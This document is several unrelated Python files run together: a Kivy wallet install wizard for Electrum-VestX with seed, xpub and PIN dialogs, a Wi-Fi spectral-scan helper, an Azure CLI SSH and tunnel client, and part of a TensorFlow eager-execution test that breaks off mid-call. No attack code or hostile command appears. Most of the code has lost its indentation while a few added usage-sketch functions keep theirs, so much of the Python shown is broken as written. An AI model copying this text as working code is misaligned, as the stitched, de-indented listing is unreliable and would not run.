choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_vestx.mnemonic import Mnemonic
from electrum_vestx.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
def is_valid(x):
try:
return kwargs['is_valid'](x)
except:
return False
self.is_valid = is_valid
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
        `on_wizard_complete` Fired when the wizard is done creating/restoring
            wallet(s).
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg, on_finished=None):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
if on_finished:
def protected_on_finished():
try:
on_finished()
except Exception as e:
self.show_error(str(e))
Clock.schedule_once(lambda dt: protected_on_finished(), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://electrum_vestx/gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, *, storage=None, aborted=False):
if storage is None and not aborted:
storage = self.create_storage(self.path)
self.dispatch('on_wizard_complete', storage)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def confirm_dialog(self, **kwargs):
WizardConfirmDialog(self, **kwargs).open()
def tos_dialog(self, **kwargs):
WizardTOSDialog(self, **kwargs).open()
def email_dialog(self, **kwargs):
WizardEmailDialog(self, **kwargs).open()
def otp_dialog(self, **kwargs):
if kwargs['otp_secret']:
WizardNewOTPDialog(self, **kwargs).open()
else:
WizardKnownOTPDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
        kwargs['message'] = _('Please paste your cosigner\'s master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_message(self, msg): self.show_error(msg)
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
if force_disable_encrypt_cb:
# do not request PIN for watching-only wallets
run_next(None, False)
return
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
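# A minimal, hypothetical sketch of how waiting_dialog() above is typically
# driven: the blocking task runs on a worker thread while the info bubble is
# shown, and on_finished is rescheduled onto the Kivy main thread via Clock.
# The names `wizard` and `slow_task` are illustrative only.
def _waiting_dialog_usage_sketch(wizard):
    def slow_task():
        # e.g. derive keys or contact a server; runs off the UI thread
        pass
    def on_finished():
        # runs on the main thread once slow_task has completed
        pass
    wizard.waiting_dialog(slow_task, _('Please wait...'), on_finished=on_finished)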
|
scanner.py
|
from multiprocessing import Process, Value
from ctypes import c_bool
import os
import time
from .spectrum_reader import SpectrumReader
class Scanner(object):
interface = None
freqlist = None
process = None
debugfs_dir = None
spectrum_reader = None
def __init__(self, interface):
self.interface = interface
self.phy = ""
self.debugfs_dir = self._find_debugfs_dir()
if not self.debugfs_dir:
            raise Exception(
                'Unable to access spectral_scan_ctl file for interface %s' % interface)
self.ctl_file = '%s/spectral_scan_ctl' % self.debugfs_dir
self.sample_count_file = '%s/spectral_count' % self.debugfs_dir
self.short_repeat_file = '%s/spectral_short_repeat' % self.debugfs_dir
self.cur_chan = 6
self.sample_count = 8
self.process = None
self.set_freqs(2412, 2472, 5)
self.spectrum_reader = SpectrumReader('%s/spectral_scan0' % self.debugfs_dir)
def dev_to_phy(self, dev):
f = open('/sys/class/net/%s/phy80211/name' % dev)
phy = f.read().strip()
f.close()
return phy
def _find_debugfs_dir(self):
''' search debugfs for spectral_scan_ctl for this interface '''
for dirname, subd, files in os.walk('/sys/kernel/debug/ieee80211'):
if 'spectral_scan_ctl' in files:
phy = dirname.split(os.path.sep)[-2]
if phy == self.dev_to_phy(self.interface):
self.phy = phy
return dirname
return None
def _scan(self, scanning):
while scanning.value:
cmd = 'iw dev %s scan trigger' % self.interface
if self.freqlist:
cmd = '%s freq %s' % (cmd, ' '.join(self.freqlist))
os.system('%s >/dev/null 2>/dev/null' % cmd)
time.sleep(0.1)
def set_freqs(self, minf, maxf, spacing):
self.freqlist = ['%s' % x for x in range(minf, maxf + spacing, spacing)]
def cmd_chanscan(self):
f = open(self.ctl_file, 'w')
f.write("chanscan")
f.close()
def cmd_disable(self):
f = open(self.ctl_file, 'w')
f.write("disable")
f.close()
def cmd_set_samplecount(self, count):
print "set sample count to %d" % count
f = open(self.sample_count_file, 'w')
f.write("%s" % count)
f.close()
def cmd_set_short_repeat(self, short_repeat):
f = open(self.short_repeat_file, 'w')
f.write("%s" % short_repeat)
f.close()
def start(self):
if self.process is None:
self.scanning = Value(c_bool, True)
self.process = Process(target=self._scan, args=(self.scanning,))
self.process.start()
def stop(self):
self.cmd_disable()
if self.process is not None:
self.scanning.value = False
self.process.join()
self.process = None
self.spectrum_reader.flush()
def get_debugfs_dir(self):
return self.debugfs_dir
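# A minimal, hypothetical usage sketch (requires root and an ath9k/ath10k
# interface with spectral-scan support; 'wlan0' is illustrative only).
def _scanner_usage_sketch():
    scanner = Scanner('wlan0')
    scanner.cmd_set_samplecount(16)   # samples per FFT report
    scanner.cmd_chanscan()            # emit samples while channel scans run
    scanner.start()                   # background process keeps triggering scans
    time.sleep(5)
    scanner.stop()                    # disables sampling and flushes the reader
    print("spectral data under %s" % scanner.get_debugfs_dir())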
|
acs_client.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import socket
import subprocess
import threading
from time import sleep
from os.path import expanduser, join, isfile
import os
import paramiko
import paramiko.agent
from sshtunnel import SSHTunnelForwarder
from scp import SCPClient
from knack.prompting import prompt_pass
from knack.util import CLIError
def _load_key(key_filename):
pkey = None
try:
pkey = paramiko.RSAKey.from_private_key_file(key_filename, None)
except paramiko.PasswordRequiredException:
key_pass = prompt_pass('Password for private key:')
pkey = paramiko.RSAKey.from_private_key_file(key_filename, key_pass)
if pkey is None:
raise CLIError('failed to load key: {}'.format(key_filename))
return pkey
def _load_keys(key_filename=None, allow_agent=True):
keys = []
default_key_path = join(expanduser("~"), '.ssh', 'id_rsa')
if key_filename is not None:
key = _load_key(key_filename)
keys.append(key)
if allow_agent:
agent = paramiko.agent.Agent()
for key in agent.get_keys():
keys.append(key)
if not keys and isfile(default_key_path):
key = _load_key(default_key_path)
keys.append(key)
if not keys:
raise CLIError('No keys available in ssh agent or no key in {}. '
'Do you need to add keys to your ssh agent via '
'ssh-add or specify a --ssh-key-file?'.format(default_key_path))
return keys
def secure_copy(user, host, src, dest, key_filename=None, allow_agent=True):
keys = _load_keys(key_filename, allow_agent)
pkey = keys[0]
ssh = paramiko.SSHClient()
proxy = None
ssh_config_file = os.path.expanduser("~/.ssh/config")
if os.path.isfile(ssh_config_file):
conf = paramiko.SSHConfig()
with open(ssh_config_file) as f:
conf.parse(f)
host_config = conf.lookup(host)
if 'proxycommand' in host_config:
proxy = paramiko.ProxyCommand(host_config['proxycommand'])
ssh.load_system_host_keys()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host, username=user, pkey=pkey, sock=proxy)
scp = SCPClient(ssh.get_transport())
try:
scp.get(src, dest)
scp.close()
except paramiko.ssh_exception.SSHException:
subprocess.call(["scp", "{}@{}:{}".format(user, host, src), dest])
class ACSClient(object):
def __init__(self, client=None):
self.client = client
self.transport = None
self.tunnel_server = None
self.host = None
self.username = None
self.port = None
def __del__(self):
if self.transport is not None:
self.transport.close()
if self.client is not None:
self.client.close()
if self.tunnel_server is not None:
self.tunnel_server.close_tunnel()
def connect(self, host, username, port=2200,
key_filename=None):
"""
Creates a connection to the remote server.
:param host: Remote host
:type host: String
:param username: User name to connect to the remote host
:type username: String
        :param port: Remote host port
        :type port: Number
        :param key_filename: Optional path to a private key file
        :type key_filename: String
        """
if not host:
raise ValueError('Host is missing')
if not username:
raise ValueError('Username is missing')
if not port:
raise ValueError('Missing port')
self.host = host
self.username = username
self.port = port
if self.client is None:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
pkey = None
if key_filename is not None:
pkey = _load_key(key_filename)
self.client.connect(
hostname=host,
port=port,
username=username,
pkey=pkey)
self.transport = self.client.get_transport()
return self.transport is not None
def run(self, command, background=False):
"""
Runs a command on the remote host
:param command: Command to run on the remote host
:type command: String
        :param background: True to run it in a separate thread,
            False to run it in the foreground
        :type background: Boolean
"""
if background:
t = threading.Thread(target=ACSClient._run_cmd, args=(self, command))
t.daemon = True
t.start()
return None
return self._run_cmd(command)
def _run_cmd(self, command):
"""
Runs a command on the remote host
:param command: Command to run on the remote host
:type command: String
"""
if not command:
raise ValueError('Command is missing')
_, stdout, stderr = self.client.exec_command(command)
return stdout, stderr
def file_exists(self, file_path):
"""
Checks if file on the remote exists
:param file_path: Full path to the file on remote machine
:type file_path: String
"""
if not file_path:
raise ValueError('Missing file path')
if self.transport is None:
raise TypeError('Transport cannot be none')
sftp = self.transport.open_sftp_client()
result = None
try:
sftp.stat(file_path)
result = True
except IOError:
result = False
finally:
sftp.close()
return result
def create_tunnel(self, remote_host, remote_port, local_port=0):
"""
Creates a tunnel to the remote host
:param remote_host: Remote host to tunnel to
:type remote_host: String
:param remote_port: Remote port to tunnel to
:type remote_port: Number
:param local_port: Local port. If set to 0, random local port is selected
:type local_port: Number
"""
        if local_port == 0:
local_port = self.get_available_local_port()
with SSHTunnelForwarder((self.host, self.port),
ssh_username=self.username,
remote_bind_address=(remote_host, remote_port),
local_bind_address=('0.0.0.0', local_port)):
try:
while True:
sleep(1)
except KeyboardInterrupt:
pass
@staticmethod
def get_available_local_port():
"""
Gets a random, available local port
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # pylint: disable=no-member
s.bind(('', 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
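# A minimal, hypothetical usage sketch; the host name and remote endpoint are
# illustrative. connect() opens the SSH transport, run() executes a command and
# returns (stdout, stderr) channels, and create_tunnel() blocks while it
# forwards a local port to the remote side.
def _acs_client_example():
    client = ACSClient()
    if client.connect('mycluster.example.com', 'azureuser', port=2200):
        stdout, _ = client.run('uname -a')
        print(stdout.read().decode())
        client.create_tunnel('localhost', 80, local_port=8001)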
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
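# A minimal illustrative sketch (not used by the tests below) of the raw eager
# execute() helper defined above: attrs are a flat tuple of (name, value) pairs
# and the outputs come back as a list of EagerTensors.
def _execute_add_sketch():
  x = constant_op.constant(1)
  y = constant_op.constant(2)
  return execute(b'Add', 1, inputs=[x, y],
                 attrs=('T', x.dtype.as_datatype_enum))[0]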
def current_device():
return constant_op.constant(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_virtual_device_configuration(cpus[0], [
context.VirtualDeviceConfiguration(),
context.VirtualDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegexp(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertIsNone(ctx.summary_writer)
ctx.summary_writer = 'mock'
self.assertEqual('mock', ctx.summary_writer)
self.assertIsNone(ctx.summary_recording)
ctx.summary_recording = 'mock'
self.assertEqual('mock', ctx.summary_recording)
self.assertIsNone(ctx.summary_step)
ctx.summary_step = 'mock'
self.assertEqual('mock', ctx.summary_step)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testRunMetadata(self):
context.enable_run_metadata()
t = constant_op.constant(1.0)
_ = t + t # Runs an operation which will be in the RunMetadata
run_metadata = context.export_run_metadata()
context.disable_run_metadata()
step_stats = run_metadata.step_stats
self.assertGreater(len(step_stats.dev_stats), 0)
cpu_stats = step_stats.dev_stats[0]
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
cpu_stats.device)
self.assertGreaterEqual(len(cpu_stats.node_stats), 1)
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.summary_writer,
ctx.summary_recording,
ctx.summary_step,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegexp(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.async_wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.async_wait()
context.async_clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
test_var = variables.Variable([2., 3.])
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
